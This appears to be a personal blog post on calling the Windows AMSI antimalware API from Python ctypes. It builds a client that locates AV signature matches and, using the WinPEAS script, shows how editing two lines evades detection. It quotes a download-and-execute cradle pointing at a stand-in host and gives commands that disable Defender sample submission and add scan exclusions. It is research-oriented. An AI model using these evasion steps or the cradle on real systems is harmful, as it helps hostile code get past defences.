Introduction

This post documents some of my personal experiments with the Python ctypes library and how to use it to interact with the Windows Antimalware Scan Interface (AMSI), in an attempt to learn a bit more about both. Later I will also discuss a small Python script I created for myself, which acts as an AMSI client to reverse AV signatures, as well as some open questions I still have and future work.

This little adventure started for me after having seen Joff Thyer’s excellent and highly recommended three-part series on using Python ctypes for shellcode execution (see below).

AMSI

My first step was to try to find out a bit more about AMSI, how it works and what problems it tries to solve.

AMSI was mainly created to fight fileless, dynamically generated script-based attacks that make use of obfuscation techniques and payload encryption. In these types of attacks scripts never touch disk, which means that they cannot be monitored / analyzed using traditional filesystem minifilter drivers. The classic example of this attack would be a PowerShell download cradle like the following, where an inner web request downloads a script into memory and the outer command executes that content:

Invoke-Expression (Invoke-Webrequest https://evil.script/file.ps)

The idea behind AMSI is that the Windows platform itself provides a vendor-agnostic interface for any program, but in particular scripting engines, to submit content that any AV vendor can consume and scan before execution. The AV engine then returns a verdict to the originating program, which can decide to halt execution of the content based on that verdict. In addition to these preventative measures, this process of submitting content to security providers creates visibility into what scripting runtimes are actually trying to execute. A scripting engine has to pre-process a provided script before it can work out what actually needs to be executed. This means that obfuscated/encrypted content will be decrypted/de-obfuscated before submission to AMSI, making evasion techniques (theoretically) less effective. Since the PowerShell engine is open-source you can actually take a look at how this AMSI call is executed here. Another interesting read is PEP 551 for the Python runtime, which also discusses this topic in more depth.

By default AMSI is enabled on all modern Windows systems, not just for PowerShell but for all common scripting engines like Windows Script Host, VBA macros and JavaScript. Since the AMSI interface can take in generic data submissions from any program that implements an AMSI client, AV engines can also use this same interface to analyze things like HTTP requests as well as to look for suspicious URLs / IP addresses.

To summarize: most runtimes for dynamic languages will submit code for analysis through AMSI before execution, which in general means that:

AMSI.dll is loaded by the scripting engine.
Script text is provided to the AmsiScanBuffer function.
Malware protection services consume this buffer, analyze the provided data and return a verdict.
Runtime blocks execution of malicious content.
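
To make the verdict in the last two steps a bit more concrete: AmsiScanBuffer reports its verdict as an AMSI_RESULT integer, and the documented AmsiResultIsMalware check treats any value at or above AMSI_RESULT_DETECTED as malware. The following is a small Python sketch of that interpretation. The constant values come from the AMSI documentation; the helper names is_malware, is_blocked_by_admin and describe are my own and not part of any API.

```python
# AMSI_RESULT values as documented for the AMSI API (amsi.h)
AMSI_RESULT_CLEAN = 0
AMSI_RESULT_NOT_DETECTED = 1
AMSI_RESULT_BLOCKED_BY_ADMIN_START = 0x4000
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 0x4FFF
AMSI_RESULT_DETECTED = 0x8000  # 32768


def is_malware(result: int) -> bool:
    """Same rule as the AmsiResultIsMalware check: detected or anything above."""
    return result >= AMSI_RESULT_DETECTED


def is_blocked_by_admin(result: int) -> bool:
    """True when the verdict falls inside the 'blocked by admin policy' range."""
    return AMSI_RESULT_BLOCKED_BY_ADMIN_START <= result <= AMSI_RESULT_BLOCKED_BY_ADMIN_END


def describe(result: int) -> str:
    """Hypothetical helper that turns a raw verdict into a readable label."""
    if is_malware(result):
        return "malware"
    if is_blocked_by_admin(result):
        return "blocked by admin policy"
    if result == AMSI_RESULT_CLEAN:
        return "clean"
    return "not detected"


if __name__ == "__main__":
    for verdict in (0, 1, 0x4000, 32768):
        print(verdict, describe(verdict))
```

A client that only cares about blocking can stop at is_malware; the finer-grained labels are mostly useful for logging.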

In the described scenario the scripting engine would be the so-called “AMSI-client” and the AV-vendor the “AMSI-provider”. Execute the below commands to see which AMSI providers are registered on your device ¹:

# See registered AMSI providers
gci 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'

# Resolve each registered provider's CLSID to its COM registration
# (the provider key names are the CLSIDs, including the curly braces)
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' | ForEach-Object {
    Get-ChildItem "HKLM:\SOFTWARE\Classes\CLSID\$($_.PSChildName)" | Format-Table -AutoSize
}
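
Since the rest of this post is in Python, here is a rough Python equivalent of the first command using the standard-library winreg module. This is only a sketch: the function name list_amsi_provider_clsids is my own, and on anything other than Windows it simply returns an empty list.

```python
import sys

PROVIDERS_KEY = r"SOFTWARE\Microsoft\AMSI\Providers"


def list_amsi_provider_clsids():
    """Return the CLSIDs registered as AMSI providers (empty list off Windows)."""
    if sys.platform != "win32":
        return []
    import winreg  # Windows-only standard library module

    clsids = []
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, PROVIDERS_KEY) as key:
            subkey_count = winreg.QueryInfoKey(key)[0]  # number of subkeys
            for index in range(subkey_count):
                clsids.append(winreg.EnumKey(key, index))
    except FileNotFoundError:
        pass  # the Providers key does not exist, so nothing is registered
    return clsids


if __name__ == "__main__":
    for clsid in list_amsi_provider_clsids():
        print(clsid)
```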

Ctypes

Trying to interact with AMSI in a programmatic way using Python required me to learn a bit more about the ctypes library. Ctypes is a Python library that provides C-compatible data types for type safety and an easy way to interact with DLLs in pure Python. This is needed because Python's built-in datatypes don’t match up one-to-one with standard C datatypes, and calling C functions with incorrect datatypes tends to end badly ^_^
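
A tiny illustration of that mismatch, which runs on any platform: Python integers are arbitrary precision, while a ctypes integer has a fixed width and silently wraps around because ctypes does no overflow checking. The variable names are just for this example.

```python
import ctypes

# Python ints grow as needed; a C int32 is always 4 bytes.
big = 2**31
wrapped = ctypes.c_int32(big)
print(ctypes.sizeof(ctypes.c_int32))  # size of the C type in bytes
print(big, "->", wrapped.value)       # the value no longer fits and wraps around

# The same happens for unsigned types: 256 does not fit in 8 bits.
small = ctypes.c_uint8(256)
print(small.value)

# Wide strings (LPCWSTR-style arguments) map to c_wchar_p and expect str, not bytes.
name = ctypes.c_wchar_p("test3r")
print(name.value)
try:
    ctypes.c_wchar_p(b"test3r")
except TypeError as exc:
    print("rejected:", exc)
```

This silent wrapping is a good reason to always set argtypes and restype explicitly, so that ctypes at least rejects arguments of the wrong kind.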

The following code shows the required steps to set up a function call using the AmsiInitialize function as an example, which is used to initialize the AMSI API. This includes the following steps:

Importing needed datatypes used in the function signature that you’d like to target.
Initializing your function pointer.
Preparing argument / return types.
Making the function call.
Checking the returned value.

# Function signature of the AmsiInitialize function
'''
HRESULT AmsiInitialize(
    [in]  LPCWSTR      appName,
    [out] HAMSICONTEXT *amsiContext
);
'''
# 1. Importing windll and needed datatype definitions from ctypes
import sys
from ctypes import windll, POINTER, HRESULT, byref
from ctypes.wintypes import LPCWSTR, HANDLE
from comtypes.hresult import S_OK  # third-party package (pip install comtypes)

# 2. Get the WINDLL Class for AMSI and grab the initialization function pointer.
AmsiInitialize = windll.amsi.AmsiInitialize

# 3. Set the expected argtypes / return types for type safety.
AmsiInitialize.argtypes = [LPCWSTR, POINTER(HANDLE)]
AmsiInitialize.restype  = HRESULT

# 4. Initialize a required empty handle object and initialize the context
amsi_ctx  = HANDLE(None)
amsi_hres = AmsiInitialize("test3r", byref(amsi_ctx))

# 5. Check return value. Because restype is HRESULT, ctypes already raises
#    OSError for failure codes, so this only catches non-S_OK success codes.
if amsi_hres != S_OK:
    print(f"AMSI Context Initialization Failed: {amsi_hres}")
    sys.exit(1)
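
One practical note on checking the returned value: HRESULT values show up in Python as signed 32-bit integers, so a failure such as E_INVALIDARG is printed as -2147024809 rather than the 0x80070057 you find in the Microsoft documentation. The helper below is a small sketch (decode_hresult is my own name) that splits a value into the documented severity bit, facility and code fields.

```python
def decode_hresult(hresult: int) -> dict:
    """Split a (possibly negative) HRESULT into its documented bit fields."""
    value = hresult & 0xFFFFFFFF  # reinterpret the signed value as unsigned 32-bit
    return {
        "hex": f"0x{value:08X}",
        "failed": bool(value & 0x80000000),  # severity bit (bit 31)
        "facility": (value >> 16) & 0x7FF,   # 11-bit facility field
        "code": value & 0xFFFF,              # 16-bit status code
    }


if __name__ == "__main__":
    # E_INVALIDARG as Python would show it
    print(decode_hresult(-2147024809))
```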

When writing ctypes code like the AmsiInitialize example, you need to convert the function signatures documented by Microsoft to Python-native or ctypes datatypes. The following are some great resources to help with these C / Python / ctypes datatype conversions:

Something I have not tried to use, but which is interesting to look into, is the ctypesgen project. As you can see from the above code snippet, there’s a lot of boilerplate needed before even a simple function can be called. Creating this manually for all needed functions is tedious, and becomes impractical if you are developing production code against interfaces that change, since every change means more manual work to correct the function signatures. Ctypesgen aims to generate all the boilerplate for you. One of its main developers gave a great presentation about this project, which doubles as a good background lecture on ctypes in general and can be seen here.

AMSI Checker (Preparation)

After reading up on both previous concepts, my next step was to connect the dots: write the required boilerplate code plus a wrapper class, and then start submitting known-bad scripts to the AMSI API to see if this would work. However, by default EDR solutions tend to eat up these files when they touch disk and to submit samples back to whatever vendor is in place, so in preparation you need to somewhat incapacitate these solutions. This means preventing them from submitting your adjusted content to their backend services, and setting up an excluded (whitelisted) directory where your binaries / scripts can live. See below some PowerShell snippets on how to do this when the main AV engine / AMSI provider is Windows Defender.

# Check current FileSubmission settings 
# (0 - on with prompt, 1 - automatic safe sample submission, 2 off, 3 automatic all submission)
$previousFileSubmissionSetting = (Get-MpPreference).SubmitSamplesConsent

# Disable FileSubmission
Set-MpPreference -SubmitSamplesConsent 2

# After testing reset to previous setting
Set-MpPreference -SubmitSamplesConsent $previousFileSubmissionSetting

# Disable active scanning of a trusted path
Add-MpPreference -ExclusionPath 'C:\Some\Path\To\Your\Whitelist\Directory\'

AMSI Checker

I wrote a Python class to instantiate the AMSI API, AMSI Context and AMSI Session after which the script would submit input files to AMSI over this session, try to zoom in onto the signature matches and report back the findings.
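
A stripped-down sketch of what such a class can look like is shown below. It is not the actual script from this post: the class name AmsiClient, its method names and the default application name are made up for illustration. The five AMSI functions and their signatures are the documented ones, and the code only does real work on Windows.

```python
import ctypes
import sys


class AmsiClient:
    """Hypothetical minimal AMSI client: one context, one session."""

    def __init__(self, app_name: str = "amsi-sketch"):
        if sys.platform != "win32":
            raise RuntimeError("AMSI is only available on Windows")
        from ctypes import wintypes

        handle = wintypes.HANDLE  # stands in for HAMSICONTEXT / HAMSISESSION
        amsi = ctypes.windll.amsi

        # Declare signatures; HRESULT restype makes ctypes raise OSError on failure.
        amsi.AmsiInitialize.argtypes = [wintypes.LPCWSTR, ctypes.POINTER(handle)]
        amsi.AmsiInitialize.restype = ctypes.HRESULT
        amsi.AmsiOpenSession.argtypes = [handle, ctypes.POINTER(handle)]
        amsi.AmsiOpenSession.restype = ctypes.HRESULT
        amsi.AmsiScanBuffer.argtypes = [
            handle, ctypes.c_void_p, wintypes.ULONG, wintypes.LPCWSTR,
            handle, ctypes.POINTER(ctypes.c_int),
        ]
        amsi.AmsiScanBuffer.restype = ctypes.HRESULT
        amsi.AmsiCloseSession.argtypes = [handle, handle]
        amsi.AmsiCloseSession.restype = None
        amsi.AmsiUninitialize.argtypes = [handle]
        amsi.AmsiUninitialize.restype = None

        self._amsi = amsi
        self._ctx = handle(None)
        self._session = handle(None)
        amsi.AmsiInitialize(app_name, ctypes.byref(self._ctx))
        amsi.AmsiOpenSession(self._ctx, ctypes.byref(self._session))

    def scan(self, data: bytes, content_name: str = "sample") -> int:
        """Submit a buffer and return the raw AMSI_RESULT (>= 32768 means detected)."""
        result = ctypes.c_int(0)
        self._amsi.AmsiScanBuffer(
            self._ctx, data, len(data), content_name,
            self._session, ctypes.byref(result),
        )
        return result.value

    def close(self) -> None:
        """Release the session and the context."""
        self._amsi.AmsiCloseSession(self._ctx, self._session)
        self._amsi.AmsiUninitialize(self._ctx)


if __name__ == "__main__" and sys.platform == "win32":
    client = AmsiClient()
    try:
        print(client.scan(b"Write-Host 'hello'", "hello.ps1"))
    finally:
        client.close()
```

Reusing a single session for all submissions is a design choice here; whether providers correlate the chunks within one session is something I have not verified.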

As an example I used the bat-version of the well-known privilege escalation project WinPEAS to perform some scanning to see if I could find out where the signature of the script lives and patch it. The following images show this process:

Downloading the script from GitHub and executing it fails.
Breaking the code up in chunks and submitting them to AMSI helps identify where the signature matches.
Manual code removal / adjustment to break the signature.
Rerunning the code sweep and seeing that AMSI is returning a healthy result.
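
The chunking and selective-removal steps above can be sketched roughly as follows. This is a simplified stand-in for my script, not the script itself: sweep and breaking_lines are illustrative names, and scan is any callable that takes text and returns True when it is flagged. In the example a fake scanner is used so the snippet runs without AMSI.

```python
def sweep(lines, scan, chunk_size=4):
    """Scan fixed-size chunks of lines; return (start, end) ranges that are flagged."""
    flagged = []
    for start in range(0, len(lines), chunk_size):
        end = min(start + chunk_size, len(lines))
        if scan("\n".join(lines[start:end])):
            flagged.append((start, end))
    return flagged


def breaking_lines(lines, start, end, scan):
    """Within a flagged chunk, find lines whose removal alone makes the chunk clean."""
    chunk = lines[start:end]
    hits = []
    for i in range(len(chunk)):
        reduced = chunk[:i] + chunk[i + 1:]
        if not scan("\n".join(reduced)):
            hits.append(start + i)
    return hits


def fake_scan(text):
    """Stand-in scanner: 'detects' text only when both markers are present."""
    return "evil_a" in text and "evil_b" in text


if __name__ == "__main__":
    script = [f"echo line {i}" for i in range(10)]
    script[4] = "evil_a"
    script[5] = "evil_b"
    for start, end in sweep(script, fake_scan):
        print("flagged chunk:", (start, end),
              "breakable at lines:", breaking_lines(script, start, end, fake_scan))
```

Note that a signature spanning a chunk boundary is missed by this fixed-size sweep, so overlapping chunks or a second pass with a different chunk size may be needed.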

1. WinPEAS.bat execution failure due to signature match.

2. Signature detection sweep using AMSI / python matches a single large section within the code.

3. Selective removal of code identifies two lines where the signature can be broken.

4. Success! No more detection and the script is allowed to run :)

Conclusion / Future Work / Other Notes

This experimentation deepened my understanding of how Windows deals with fileless threats as well as of using the ctypes library to script interactions with AMSI. Some things I am still unclear about related to this topic include:

Some EDR vendors supposedly create their own AMSI implementation, making bypasses / AMSI patching harder (or at least vendor-specific), but I’ve not been able to verify that.
I’d like to try out some API monitoring tools to see if there’s a difference between my AMSI submission and PowerShell/Python scripting engine submissions. These engines might change the formatting / content before submission, therefore possibly hitting different signatures.

Some next things I’d still like to try out or follow up on:

Implementing an AMSI Provider in addition to the current Client. Some interesting resources for this would be: Blackberry - How to Implement An AMSI Provider, Microsoft - iantimalwareprovider-sample, Github - netbiosX/AMSI-Provider
Comparing my script's success rate with that of ThreatCheck / DefenderCheck, where the Defender engine is loaded / called directly instead of indirectly going through AMSI. I tried implementing a binary-search-like approach similar to the one those tools use, and started missing signatures.
Investigate unloading / patching AMSI and look into other well known AMSI bypass and exploitation approaches (e.g. create fake providers for persistence ² ³) as well as how to automate these.
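
For reference, the binary-search-like narrowing mentioned above could look roughly like this. It is my own simplified sketch and not taken from ThreatCheck or DefenderCheck: smallest_flagged_prefix is a made-up name, scan is any callable returning True for flagged bytes, and the search assumes that once a prefix is flagged every longer prefix is flagged too.

```python
from typing import Callable, Optional


def smallest_flagged_prefix(data: bytes, scan: Callable[[bytes], bool]) -> Optional[int]:
    """Binary-search the shortest prefix length of data that scan() flags.

    Assumes monotonic detection: if data[:n] is flagged, so is data[:m] for m > n.
    Returns None when the full buffer is not flagged at all.
    """
    if not scan(data):
        return None
    lo, hi = 0, len(data)  # data[:lo] is treated as clean, data[:hi] is flagged
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if scan(data[:mid]):
            hi = mid
        else:
            lo = mid
    return hi


if __name__ == "__main__":
    sample = b"A" * 100 + b"SIGNATURE" + b"B" * 50
    end = smallest_flagged_prefix(sample, lambda blob: b"SIGNATURE" in blob)
    print("detection triggers once the prefix reaches byte", end)
```

The monotonicity assumption is the weak spot: if a verdict depends on several separate fragments or on heuristics, a shorter prefix can be clean for reasons the search cannot see, which may be one explanation for missed signatures.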

“AMSI Bypass in one tweet” - by Matt Graeber

One thing I was not aware of before is that you can look at the Defender threat detection information when scripts/executables still match, to see where they are matched (on disk vs. in memory):

# Check last detection which indicates the origin of the detection / threat description
Get-MpThreatDetection | sort InitialDetectionTime -Descending | select -First 1
